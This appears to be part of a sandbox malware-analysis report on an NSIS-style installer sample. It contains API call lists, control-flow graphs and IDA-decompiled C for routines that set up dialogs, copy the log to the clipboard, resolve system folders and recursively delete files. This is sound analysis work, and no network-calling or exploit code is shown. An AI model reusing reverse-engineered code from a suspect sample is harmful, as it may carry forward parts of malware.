                                                            0x004052ea
                                                            0x004052f0
                                                            0x00405312
                                                            0x00405312
                                                            0x00405318
                                                            0x0040536d
                                                            0x0040536d
                                                            0x00405370
                                                            0x00000000
                                                            0x00000000
                                                            0x00405372
                                                            0x00405375
                                                            0x00405378
                                                            0x00000000
                                                            0x00000000
                                                            0x00405382
                                                            0x00405388
                                                            0x0040538a
                                                            0x0040538d
                                                            0x0040548a
                                                            0x00000000
                                                            0x0040548a
                                                            0x0040539c
                                                            0x004053a8
                                                            0x004053b1
                                                            0x004053b8
                                                            0x004053bc
                                                            0x004053bf
                                                            0x004053c8
                                                            0x004053ce
                                                            0x004053d1
                                                            0x004053d1
                                                            0x004053e1
                                                            0x004053e7
                                                            0x004053ea
                                                            0x004053f5
                                                            0x004053f5
                                                            0x004053f6
                                                            0x004053f9
                                                            0x00405400
                                                            0x00405407
                                                            0x0040540f
                                                            0x0040540f
                                                            0x0040541d
                                                            0x00405423
                                                            0x00405426
                                                            0x00405426
                                                            0x0040542d
                                                            0x00405433
                                                            0x0040543c
                                                            0x00405443
                                                            0x0040544c
                                                            0x0040544e
                                                            0x00405451
                                                            0x00405460
                                                            0x00405462
                                                            0x00405465
                                                            0x00405466
                                                            0x00405469
                                                            0x0040546a
                                                            0x0040546b
                                                            0x0040546b
                                                            0x00405473
                                                            0x0040547e
                                                            0x00405484
                                                            0x00405484
                                                            0x00000000
                                                            0x004053ea
                                                            0x0040531a
                                                            0x00405320
                                                            0x0040534e
                                                            0x00405350
                                                            0x00405356
                                                            0x00405358
                                                            0x00405361
                                                            0x00405361
                                                            0x00405368
                                                            0x00000000
                                                            0x00405368
                                                            0x00405324
                                                            0x0040532e
                                                            0x00000000
                                                            0x004052f2
                                                            0x004052f2
                                                            0x004052f8
                                                            0x00405333
                                                            0x00000000
                                                            0x0040533a
                                                            0x00405301
                                                            0x00405308
                                                            0x0040530d
                                                            0x00000000
                                                            0x0040530d
                                                            0x004052f0
                                                            0x00405129
                                                            0x0040512d
                                                            0x00405136
                                                            0x0040513d
                                                            0x00405140
                                                            0x00405143
                                                            0x00405146
                                                            0x00405147
                                                            0x00405148
                                                            0x00405161
                                                            0x00405164
                                                            0x0040516e
                                                            0x0040517d
                                                            0x00405185
                                                            0x0040518d
                                                            0x00405192
                                                            0x00405195
                                                            0x004051a1
                                                            0x004051aa
                                                            0x004051b3
                                                            0x004051d6
                                                            0x004051dc
                                                            0x004051ed
                                                            0x004051f2
                                                            0x00405200
                                                            0x0040520e
                                                            0x0040520e
                                                            0x00405213
                                                            0x00405221
                                                            0x00405221
                                                            0x00405226
                                                            0x00405229
                                                            0x0040522e
                                                            0x0040523a
                                                            0x00405243
                                                            0x00405250
                                                            0x0040525f
                                                            0x00405252
                                                            0x00405257
                                                            0x00405257
                                                            0x0040526b
                                                            0x0040526b
                                                            0x0040527f
                                                            0x00405288
                                                            0x00405291
                                                            0x004052a1
                                                            0x004052ad
                                                            0x004052ad
                                                            0x00000000

                                                            APIs
                                                            • GetDlgItem.USER32(?,00000403), ref: 00405167
                                                            • GetDlgItem.USER32(?,000003EE), ref: 00405176
                                                            • GetClientRect.USER32(?,?), ref: 004051B3
                                                            • GetSystemMetrics.USER32(00000015), ref: 004051BB
                                                            • SendMessageA.USER32(?,0000101B,00000000,00000002), ref: 004051DC
                                                            • SendMessageA.USER32(?,00001036,00004000,00004000), ref: 004051ED
                                                            • SendMessageA.USER32(?,00001001,00000000,?), ref: 00405200
                                                            • SendMessageA.USER32(?,00001026,00000000,?), ref: 0040520E
                                                            • SendMessageA.USER32(?,00001024,00000000,?), ref: 00405221
                                                            • ShowWindow.USER32(00000000,?,0000001B,?), ref: 00405243
                                                            • ShowWindow.USER32(?,00000008), ref: 00405257
                                                            • GetDlgItem.USER32(?,000003EC), ref: 00405278
                                                            • SendMessageA.USER32(00000000,00000401,00000000,75300000), ref: 00405288
                                                            • SendMessageA.USER32(00000000,00000409,00000000,?), ref: 004052A1
                                                            • SendMessageA.USER32(00000000,00002001,00000000,?), ref: 004052AD
                                                            • GetDlgItem.USER32(?,000003F8), ref: 00405185
                                                              • Part of subcall function 00404001: SendMessageA.USER32(00000028,?,00000001,00403E32), ref: 0040400F
                                                            • GetDlgItem.USER32(?,000003EC), ref: 004052C9
                                                            • CreateThread.KERNEL32(00000000,00000000,Function_0000509B,00000000), ref: 004052D7
                                                            • CloseHandle.KERNELBASE(00000000), ref: 004052DE
                                                            • ShowWindow.USER32(00000000), ref: 00405301
                                                            • ShowWindow.USER32(?,00000008), ref: 00405308
                                                            • ShowWindow.USER32(00000008), ref: 0040534E
                                                            • SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00405382
                                                            • CreatePopupMenu.USER32 ref: 00405393
                                                            • AppendMenuA.USER32(00000000,00000000,00000001,00000000), ref: 004053A8
                                                            • GetWindowRect.USER32(?,000000FF), ref: 004053C8
                                                            • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 004053E1
                                                            • SendMessageA.USER32(?,0000102D,00000000,?), ref: 0040541D
                                                            • OpenClipboard.USER32(00000000), ref: 0040542D
                                                            • EmptyClipboard.USER32 ref: 00405433
                                                            • GlobalAlloc.KERNEL32(00000042,?), ref: 0040543C
                                                            • GlobalLock.KERNEL32(00000000), ref: 00405446
                                                            • SendMessageA.USER32(?,0000102D,00000000,?), ref: 0040545A
                                                            • GlobalUnlock.KERNEL32(00000000), ref: 00405473
                                                            • SetClipboardData.USER32(00000001,00000000), ref: 0040547E
                                                            • CloseClipboard.USER32 ref: 00405484
                                                            Strings
                                                            • Bogtilrettelgnings82 Setup: Installing, xrefs: 004053F9
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.5770307662.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.5770278875.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.5770363207.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.5770406479.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.5770406479.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.5770406479.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.5770406479.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.5770672204.0000000000435000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.5770672204.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_zp.jbxd
                                                            Similarity
                                                            • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
                                                            • String ID: Bogtilrettelgnings82 Setup: Installing
                                                            • API String ID: 590372296-1744407654
                                                            • Opcode ID: 437612bc1eb72f28560cb0be49cc86cd56c36880779762069c67ba85a006c75e
                                                            • Instruction ID: 1ce46468062b4959d591950d49ef568145fe019f8889c876f185e2652ae6ab29
                                                            • Opcode Fuzzy Hash: 437612bc1eb72f28560cb0be49cc86cd56c36880779762069c67ba85a006c75e
                                                            • Instruction Fuzzy Hash: AFA17A71900209BFDB219FA0DD89AAE7F79FB04345F10407AFA05B62A0C7B55E41DF69
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 409 405d00-405d0b 410 405d0d-405d1c 409->410 411 405d1e-405d33 409->411 410->411 412 405f26-405f2a 411->412 413 405d39-405d44 411->413 415 405f30-405f3a 412->415 416 405d56-405d60 412->416 413->412 414 405d4a-405d51 413->414 414->412 418 405f45-405f46 415->418 419 405f3c-405f40 call 405cde 415->419 416->415 417 405d66-405d6d 416->417 420 405d73-405da8 417->420 421 405f19 417->421 419->418 423 405ec3-405ec6 420->423 424 405dae-405db9 GetVersion 420->424 425 405f23-405f25 421->425 426 405f1b-405f21 421->426 429 405ef6-405ef9 423->429 430 405ec8-405ecb 423->430 427 405dd3 424->427 428 405dbb-405dbf 424->428 425->412 426->412 436 405dda-405de1 427->436 428->427 433 405dc1-405dc5 428->433 431 405f07-405f17 lstrlenA 429->431 432 405efb-405f02 call 405d00 429->432 434 405edb-405ee7 call 405cde 430->434 435 405ecd-405ed9 call 405c3c 430->435 431->412 432->431 433->427 438 405dc7-405dcb 433->438 447 405eec-405ef2 434->447 435->447 440 405de3-405de5 436->440 441 405de6-405de8 436->441 438->427 443 405dcd-405dd1 438->443 440->441 445 405e21-405e24 441->445 446 405dea-405e0d call 405bc5 441->446 443->436 448 405e34-405e37 445->448 449 405e26-405e32 GetSystemDirectoryA 445->449 457 405e13-405e1c call 405d00 446->457 458 405eaa-405eae 446->458 447->431 451 405ef4 447->451 455 405ea1-405ea3 448->455 456 405e39-405e47 GetWindowsDirectoryA 448->456 454 405ea5-405ea8 449->454 453 405ebb-405ec1 call 405f49 451->453 453->431 454->453 454->458 455->454 459 405e49-405e53 455->459 456->455 457->454 458->453 462 405eb0-405eb6 lstrcatA 458->462 464 405e55-405e58 459->464 465 405e6d-405e83 SHGetSpecialFolderLocation 459->465 462->453 464->465 467 405e5a-405e61 464->467 468 405e85-405e9c SHGetPathFromIDListA CoTaskMemFree 465->468 469 405e9e 465->469 470 405e69-405e6b 467->470 468->454 468->469 469->455 470->454 470->465
                                                            C-Code - Quality: 74%
                                                            			E00405D00(void* __ebx, void* __edi, void* __esi, signed int _a4, signed int _a8) {
                                                            				signed int _v8;
                                                            				struct _ITEMIDLIST* _v12;
                                                            				signed int _v16;
                                                            				signed char _v20;
                                                            				signed int _v24;
                                                            				signed char _v28;
                                                            				signed int _t37;
                                                            				CHAR* _t38;
                                                            				signed int _t40;
                                                            				int _t41;
                                                            				char _t51;
                                                            				char _t52;
                                                            				char _t54;
                                                            				char _t56;
                                                            				void* _t64;
                                                            				signed int _t70;
                                                            				signed int _t75;
                                                            				signed int _t76;
                                                            				intOrPtr _t80;
                                                            				char _t82;
                                                            				void* _t86;
                                                            				CHAR* _t87;
                                                            				void* _t89;
                                                            				signed int _t96;
                                                            				signed int _t98;
                                                            				void* _t99;
                                                            
                                                            				_t89 = __esi;
                                                            				_t86 = __edi;
                                                            				_t64 = __ebx;
                                                            				_t37 = _a8;
                                                            				if(_t37 < 0) {
                                                            					_t80 =  *0x422ebc; // 0x6f57cb
                                                            					_t37 =  *(_t80 - 4 + _t37 * 4);
                                                            				}
                                                            				_push(_t64);
                                                            				_t75 =  *0x423718 + _t37;
                                                            				_t38 = 0x422680;
                                                            				_push(_t89);
                                                            				_push(_t86);
                                                            				_t87 = 0x422680;
                                                            				if(_a4 >= 0x422680 && _a4 - 0x422680 < 0x800) {
                                                            					_t87 = _a4;
                                                            					_a4 = _a4 & 0x00000000;
                                                            				}
                                                            				while(1) {
                                                            					_t82 =  *_t75;
                                                            					if(_t82 == 0) {
                                                            						break;
                                                            					}
                                                            					__eflags = _t87 - _t38 - 0x400;
                                                            					if(_t87 - _t38 >= 0x400) {
                                                            						break;
                                                            					}
                                                            					_t75 = _t75 + 1;
                                                            					__eflags = _t82 - 4;
                                                            					_a8 = _t75;
                                                            					if(__eflags >= 0) {
                                                            						if(__eflags != 0) {
                                                            							 *_t87 = _t82;
                                                            							_t87 =  &(_t87[1]);
                                                            							__eflags = _t87;
                                                            						} else {
                                                            							 *_t87 =  *_t75;
                                                            							_t87 =  &(_t87[1]);
                                                            							_t75 = _t75 + 1;
                                                            						}
                                                            						continue;
                                                            					}
                                                            					_t40 =  *(_t75 + 1);
                                                            					_t76 =  *_t75;
                                                            					_t96 = (_t40 & 0x0000007f) << 0x00000007 | _t76 & 0x0000007f;
                                                            					_a8 = _a8 + 2;
                                                            					_v28 = _t76 | 0x00000080;
                                                            					_t70 = _t76;
                                                            					_v24 = _t70;
                                                            					__eflags = _t82 - 2;
                                                            					_v20 = _t40 | 0x00000080;
                                                            					_v16 = _t40;
                                                            					if(_t82 != 2) {
                                                            						__eflags = _t82 - 3;
                                                            						if(_t82 != 3) {
                                                            							__eflags = _t82 - 1;
                                                            							if(_t82 == 1) {
                                                            								__eflags = (_t40 | 0xffffffff) - _t96;
                                                            								E00405D00(_t70, _t87, _t96, _t87, (_t40 | 0xffffffff) - _t96);
                                                            							}
                                                            							L42:
                                                            							_t41 = lstrlenA(_t87);
                                                            							_t75 = _a8;
                                                            							_t87 =  &(_t87[_t41]);
                                                            							_t38 = 0x422680;
                                                            							continue;
                                                            						}
                                                            						__eflags = _t96 - 0x1d;
                                                            						if(_t96 != 0x1d) {
                                                            							__eflags = (_t96 << 0xa) + 0x424000;
                                                            							E00405CDE(_t87, (_t96 << 0xa) + 0x424000);
                                                            						} else {
                                                            							E00405C3C(_t87,  *0x4236e8);
                                                            						}
                                                            						__eflags = _t96 + 0xffffffeb - 7;
                                                            						if(_t96 + 0xffffffeb < 7) {
                                                            							L33:
                                                            							E00405F49(_t87);
                                                            						}
                                                            						goto L42;
                                                            					}
                                                            					_t98 = 2;
                                                            					_t51 = GetVersion();
                                                            					__eflags = _t51;
                                                            					if(_t51 >= 0) {
                                                            						L13:
                                                            						_v8 = 1;
                                                            						L14:
                                                            						__eflags =  *0x423764;
                                                            						if( *0x423764 != 0) {
                                                            							_t98 = 4;
                                                            						}
                                                            						__eflags = _t70;
                                                            						if(_t70 >= 0) {
                                                            							__eflags = _t70 - 0x25;
                                                            							if(_t70 != 0x25) {
                                                            								__eflags = _t70 - 0x24;
                                                            								if(_t70 == 0x24) {
                                                            									GetWindowsDirectoryA(_t87, 0x400);
                                                            									_t98 = 0;
                                                            								}
                                                            								while(1) {
                                                            									__eflags = _t98;
                                                            									if(_t98 == 0) {
                                                            										goto L30;
                                                            									}
                                                            									_t52 =  *0x4236e4;
                                                            									_t98 = _t98 - 1;
                                                            									__eflags = _t52;
                                                            									if(_t52 == 0) {
                                                            										L26:
                                                            										_t54 = SHGetSpecialFolderLocation( *0x4236e8,  *(_t99 + _t98 * 4 - 0x18),  &_v12);
                                                            										__eflags = _t54;
                                                            										if(_t54 != 0) {
                                                            											L28:
                                                            											 *_t87 =  *_t87 & 0x00000000;
                                                            											__eflags =  *_t87;
                                                            											continue;
                                                            										}
                                                            										__imp__SHGetPathFromIDListA(_v12, _t87);
                                                            										__imp__CoTaskMemFree(_v12);
                                                            										__eflags = _t54;
                                                            										if(_t54 != 0) {
                                                            											goto L30;
                                                            										}
                                                            										goto L28;
                                                            									}
                                                            									__eflags = _v8;
                                                            									if(_v8 == 0) {
                                                            										goto L26;
                                                            									}
                                                            									_t56 =  *_t52( *0x4236e8,  *(_t99 + _t98 * 4 - 0x18), 0, 0, _t87); // executed
                                                            									__eflags = _t56;
                                                            									if(_t56 == 0) {
                                                            										goto L30;
                                                            									}
                                                            									goto L26;
                                                            								}
                                                            								goto L30;
                                                            							}
                                                            							GetSystemDirectoryA(_t87, 0x400);
                                                            							goto L30;
                                                            						} else {
                                                            							_t73 = (_t70 & 0x0000003f) +  *0x423718;
                                                            							E00405BC5(0x80000002, "Software\\Microsoft\\Windows\\CurrentVersion", (_t70 & 0x0000003f) +  *0x423718, _t87, _t70 & 0x00000040);
                                                            							__eflags =  *_t87;
                                                            							if( *_t87 != 0) {
                                                            								L31:
                                                            								__eflags = _v16 - 0x1a;
                                                            								if(_v16 == 0x1a) {
                                                            									lstrcatA(_t87, "\\Microsoft\\Internet Explorer\\Quick Launch");
                                                            								}
                                                            								goto L33;
                                                            							}
                                                            							E00405D00(_t73, _t87, _t98, _t87, _v16);
                                                            							L30:
                                                            							__eflags =  *_t87;
                                                            							if( *_t87 == 0) {
                                                            								goto L33;
                                                            							}
                                                            							goto L31;
                                                            						}
                                                            					}
                                                            					__eflags = _t51 - 0x5a04;
                                                            					if(_t51 == 0x5a04) {
                                                            						goto L13;
                                                            					}
                                                            					__eflags = _v16 - 0x23;
                                                            					if(_v16 == 0x23) {
                                                            						goto L13;
                                                            					}
                                                            					__eflags = _v16 - 0x2e;
                                                            					if(_v16 == 0x2e) {
                                                            						goto L13;
                                                            					} else {
                                                            						_v8 = _v8 & 0x00000000;
                                                            						goto L14;
                                                            					}
                                                            				}
                                                            				 *_t87 =  *_t87 & 0x00000000;
                                                            				if(_a4 == 0) {
                                                            					return _t38;
                                                            				}
                                                            				return E00405CDE(_a4, _t38);
                                                            			}





























                                                            0x00405d00
                                                            0x00405d00
                                                            0x00405d00
                                                            0x00405d06
                                                            0x00405d0b
                                                            0x00405d0d
                                                            0x00405d1c
                                                            0x00405d1c
                                                            0x00405d24
                                                            0x00405d25
                                                            0x00405d27
                                                            0x00405d2f
                                                            0x00405d30
                                                            0x00405d31
                                                            0x00405d33
                                                            0x00405d4a
                                                            0x00405d4d
                                                            0x00405d4d
                                                            0x00405f26
                                                            0x00405f26
                                                            0x00405f2a
                                                            0x00000000
                                                            0x00000000
                                                            0x00405d5a
                                                            0x00405d60
                                                            0x00000000
                                                            0x00000000
                                                            0x00405d66
                                                            0x00405d67
                                                            0x00405d6a
                                                            0x00405d6d
                                                            0x00405f19
                                                            0x00405f23
                                                            0x00405f25
                                                            0x00405f25
                                                            0x00405f1b
                                                            0x00405f1d
                                                            0x00405f1f
                                                            0x00405f20
                                                            0x00405f20
                                                            0x00000000
                                                            0x00405f19
                                                            0x00405d73
                                                            0x00405d77
                                                            0x00405d87
                                                            0x00405d8b
                                                            0x00405d92
                                                            0x00405d95
                                                            0x00405d99
                                                            0x00405d9f
                                                            0x00405da2
                                                            0x00405da5
                                                            0x00405da8
                                                            0x00405ec3
                                                            0x00405ec6
                                                            0x00405ef6
                                                            0x00405ef9
                                                            0x00405efe
                                                            0x00405f02
                                                            0x00405f02
                                                            0x00405f07
                                                            0x00405f08
                                                            0x00405f0d
                                                            0x00405f10
                                                            0x00405f12
                                                            0x00000000
                                                            0x00405f12
                                                            0x00405ec8
                                                            0x00405ecb
                                                            0x00405ee0
                                                            0x00405ee7
                                                            0x00405ecd
                                                            0x00405ed4
                                                            0x00405ed4
                                                            0x00405eef
                                                            0x00405ef2
                                                            0x00405ebb
                                                            0x00405ebc
                                                            0x00405ebc
                                                            0x00000000
                                                            0x00405ef2
                                                            0x00405db0
                                                            0x00405db1
                                                            0x00405db7
                                                            0x00405db9
                                                            0x00405dd3
                                                            0x00405dd3
                                                            0x00405dda
                                                            0x00405dda
                                                            0x00405de1
                                                            0x00405de5
                                                            0x00405de5
                                                            0x00405de6
                                                            0x00405de8
                                                            0x00405e21
                                                            0x00405e24
                                                            0x00405e34
                                                            0x00405e37
                                                            0x00405e3f
                                                            0x00405e45
                                                            0x00405e45
                                                            0x00405ea1
                                                            0x00405ea1
                                                            0x00405ea3
                                                            0x00000000
                                                            0x00000000
                                                            0x00405e49
                                                            0x00405e50
                                                            0x00405e51
                                                            0x00405e53
                                                            0x00405e6d
                                                            0x00405e7b
                                                            0x00405e81
                                                            0x00405e83
                                                            0x00405e9e
                                                            0x00405e9e
                                                            0x00405e9e
                                                            0x00000000
                                                            0x00405e9e
                                                            0x00405e89
                                                            0x00405e94
                                                            0x00405e9a
                                                            0x00405e9c
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00405e9c
                                                            0x00405e55
                                                            0x00405e58
                                                            0x00000000
                                                            0x00000000
                                                            0x00405e67
                                                            0x00405e69
                                                            0x00405e6b
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00405e6b
                                                            0x00000000
                                                            0x00405ea1
                                                            0x00405e2c
                                                            0x00000000
                                                            0x00405dea
                                                            0x00405def
                                                            0x00405e05
                                                            0x00405e0a
                                                            0x00405e0d
                                                            0x00405eaa
                                                            0x00405eaa
                                                            0x00405eae
                                                            0x00405eb6
                                                            0x00405eb6
                                                            0x00000000
                                                            0x00405eae
                                                            0x00405e17
                                                            0x00405ea5
                                                            0x00405ea5
                                                            0x00405ea8
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00405ea8
                                                            0x00405de8
                                                            0x00405dbb
                                                            0x00405dbf
                                                            0x00000000
                                                            0x00000000
                                                            0x00405dc1
                                                            0x00405dc5
                                                            0x00000000
                                                            0x00000000
                                                            0x00405dc7
                                                            0x00405dcb
                                                            0x00000000
                                                            0x00405dcd
                                                            0x00405dcd
                                                            0x00000000
                                                            0x00405dcd
                                                            0x00405dcb
                                                            0x00405f30
                                                            0x00405f3a
                                                            0x00405f46
                                                            0x00405f46
                                                            0x00000000

                                                            APIs
                                                            • GetVersion.KERNEL32(?,Skipped: C:\Users\user\AppData\Local\Temp\nsq8C22.tmp\System.dll,00000000,00405001,Skipped: C:\Users\user\AppData\Local\Temp\nsq8C22.tmp\System.dll,00000000), ref: 00405DB1
                                                            • GetSystemDirectoryA.KERNEL32(Call,00000400), ref: 00405E2C
                                                            • GetWindowsDirectoryA.KERNEL32(Call,00000400), ref: 00405E3F
                                                            • SHGetSpecialFolderLocation.SHELL32(?,00000000), ref: 00405E7B
                                                            • SHGetPathFromIDListA.SHELL32(00000000,Call), ref: 00405E89
                                                            • CoTaskMemFree.OLE32(00000000), ref: 00405E94
                                                            • lstrcatA.KERNEL32(Call,\Microsoft\Internet Explorer\Quick Launch), ref: 00405EB6
                                                            • lstrlenA.KERNEL32(Call,?,Skipped: C:\Users\user\AppData\Local\Temp\nsq8C22.tmp\System.dll,00000000,00405001,Skipped: C:\Users\user\AppData\Local\Temp\nsq8C22.tmp\System.dll,00000000), ref: 00405F08
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.5770307662.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.5770278875.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.5770363207.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.5770406479.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.5770406479.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.5770406479.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.5770406479.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.5770672204.0000000000435000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.5770672204.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_zp.jbxd
                                                            Similarity
                                                            • API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskVersionWindowslstrcatlstrlen
                                                            • String ID: Call$Skipped: C:\Users\user\AppData\Local\Temp\nsq8C22.tmp\System.dll$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                                                            • API String ID: 900638850-2428919041
                                                            • Opcode ID: 6248596aa2a3f32bb0f27d4d089357d57926bfd5a2cc4d0eec9b3e0488fff0f8
                                                            • Instruction ID: 5b78479c63d7672d4d5e7177f0c07aa329b3d72ca06d4f46a7854d902b85ef7c
                                                            • Opcode Fuzzy Hash: 6248596aa2a3f32bb0f27d4d089357d57926bfd5a2cc4d0eec9b3e0488fff0f8
                                                            • Instruction Fuzzy Hash: B661F171A04A01ABEF205F24DC88BAF3B68EB15314F10813BE941B62D0D33D5A42DF9E
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 471 40559e-4055c4 call 40585c 474 4055c6-4055d8 DeleteFileA 471->474 475 4055dd-4055e4 471->475 476 405767-40576b 474->476 477 4055e6-4055e8 475->477 478 4055f7-405607 call 405cde 475->478 479 405715-40571a 477->479 480 4055ee-4055f1 477->480 484 405616-405617 call 4057b5 478->484 485 405609-405614 lstrcatA 478->485 479->476 483 40571c-40571f 479->483 480->478 480->479 486 405721-405727 483->486 487 405729-405731 call 405fe2 483->487 488 40561c-40561f 484->488 485->488 486->476 487->476 495 405733-405747 call 40576e call 405556 487->495 491 405621-405628 488->491 492 40562a-405630 lstrcatA 488->492 491->492 494 405635-405653 lstrlenA FindFirstFileA 491->494 492->494 496 405659-405670 call 405799 494->496 497 40570b-40570f 494->497 507 405749-40574c 495->507 508 40575f-405762 call 404fc9 495->508 505 405672-405676 496->505 506 40567b-40567e 496->506 497->479 500 405711 497->500 500->479 505->506 509 405678 505->509 510 405680-405685 506->510 511 405691-40569f call 405cde 506->511 507->486 513 40574e-40575d call 404fc9 call 405b92 507->513 508->476 509->506 515 405687-405689 510->515 516 4056ea-4056fc FindNextFileA 510->516 521 4056a1-4056a9 511->521 522 4056b6-4056c1 call 405556 511->522 513->476 515->511 517 40568b-40568f 515->517 516->496 520 405702-405705 FindClose 516->520 517->511 517->516 520->497 521->516 524 4056ab-4056b4 call 40559e 521->524 531 4056e2-4056e5 call 404fc9 522->531 532 4056c3-4056c6 522->532 524->516 531->516 534 4056c8-4056d8 call 404fc9 call 405b92 532->534 535 4056da-4056e0 532->535 534->516 535->516
                                                            C-Code - Quality: 98%
                                                            			E0040559E(void* __eflags, signed int _a4, signed int _a8) {
                                                            				signed int _v8;
                                                            				void* _v12;
                                                            				signed int _v16;
                                                            				struct _WIN32_FIND_DATAA _v336;
                                                            				signed int _t40;
                                                            				char* _t53;
                                                            				signed int _t55;
                                                            				signed int _t58;
                                                            				signed int _t64;
                                                            				signed int _t66;
                                                            				void* _t68;
                                                            				signed char _t69;
                                                            				CHAR* _t71;
                                                            				CHAR* _t72;
                                                            				char* _t75;
                                                            
                                                            				_t69 = _a8;
                                                            				_t72 = _a4;
                                                            				_v8 = _t69 & 0x00000004;
                                                            				_t40 = E0040585C(__eflags, _t72);
                                                            				_v16 = _t40;
                                                            				if((_t69 & 0x00000008) != 0) {
                                                            					_t66 = DeleteFileA(_t72); // executed
                                                            					asm("sbb eax, eax");
                                                            					_t68 =  ~_t66 + 1;
                                                            					 *0x423768 =  *0x423768 + _t68;
                                                            					return _t68;
                                                            				}
                                                            				_a4 = _t69;
                                                            				_t8 =  &_a4;
                                                            				 *_t8 = _a4 & 0x00000001;
                                                            				__eflags =  *_t8;
                                                            				if( *_t8 == 0) {
                                                            					L5:
                                                            					E00405CDE(0x420ce8, _t72);
                                                            					__eflags = _a4;
                                                            					if(_a4 == 0) {
                                                            						E004057B5(_t72);
                                                            					} else {
                                                            						lstrcatA(0x420ce8, "\*.*");
                                                            					}
                                                            					__eflags =  *_t72;
                                                            					if( *_t72 != 0) {
                                                            						L10:
                                                            						lstrcatA(_t72, 0x409014);
                                                            						L11:
                                                            						_t71 =  &(_t72[lstrlenA(_t72)]);
                                                            						_t40 = FindFirstFileA(0x420ce8,  &_v336);
                                                            						__eflags = _t40 - 0xffffffff;
                                                            						_v12 = _t40;
                                                            						if(_t40 == 0xffffffff) {
                                                            							L29:
                                                            							__eflags = _a4;
                                                            							if(_a4 != 0) {
                                                            								_t32 = _t71 - 1;
                                                            								 *_t32 =  *(_t71 - 1) & 0x00000000;
                                                            								__eflags =  *_t32;
                                                            							}
                                                            							goto L31;
                                                            						} else {
                                                            							goto L12;
                                                            						}
                                                            						do {
                                                            							L12:
                                                            							_t75 =  &(_v336.cFileName);
                                                            							_t53 = E00405799( &(_v336.cFileName), 0x3f);
                                                            							__eflags =  *_t53;
                                                            							if( *_t53 != 0) {
                                                            								__eflags = _v336.cAlternateFileName;
                                                            								if(_v336.cAlternateFileName != 0) {
                                                            									_t75 =  &(_v336.cAlternateFileName);
                                                            								}
                                                            							}
                                                            							__eflags =  *_t75 - 0x2e;
                                                            							if( *_t75 != 0x2e) {
                                                            								L19:
                                                            								E00405CDE(_t71, _t75);
                                                            								__eflags = _v336.dwFileAttributes & 0x00000010;
                                                            								if(__eflags == 0) {
                                                            									_t55 = E00405556(__eflags, _t72, _v8);
                                                            									__eflags = _t55;
                                                            									if(_t55 != 0) {
                                                            										E00404FC9(0xfffffff2, _t72);
                                                            									} else {
                                                            										__eflags = _v8 - _t55;
                                                            										if(_v8 == _t55) {
                                                            											 *0x423768 =  *0x423768 + 1;
                                                            										} else {
                                                            											E00404FC9(0xfffffff1, _t72);
                                                            											E00405B92(_t72, 0);
                                                            										}
                                                            									}
                                                            								} else {
                                                            									__eflags = (_a8 & 0x00000003) - 3;
                                                            									if(__eflags == 0) {
                                                            										E0040559E(__eflags, _t72, _a8);
                                                            									}
                                                            								}
                                                            								goto L27;
                                                            							}
                                                            							_t64 =  *((intOrPtr*)(_t75 + 1));
                                                            							__eflags = _t64;
                                                            							if(_t64 == 0) {
                                                            								goto L27;
                                                            							}
                                                            							__eflags = _t64 - 0x2e;
                                                            							if(_t64 != 0x2e) {
                                                            								goto L19;
                                                            							}
                                                            							__eflags =  *((char*)(_t75 + 2));
                                                            							if( *((char*)(_t75 + 2)) == 0) {
                                                            								goto L27;
                                                            							}
                                                            							goto L19;
                                                            							L27:
                                                            							_t58 = FindNextFileA(_v12,  &_v336);
                                                            							__eflags = _t58;
                                                            						} while (_t58 != 0);
                                                            						_t40 = FindClose(_v12);
                                                            						goto L29;
                                                            					}
                                                            					__eflags =  *0x420ce8 - 0x5c;
                                                            					if( *0x420ce8 != 0x5c) {
                                                            						goto L11;
                                                            					}
                                                            					goto L10;
                                                            				} else {
                                                            					__eflags = _t40;
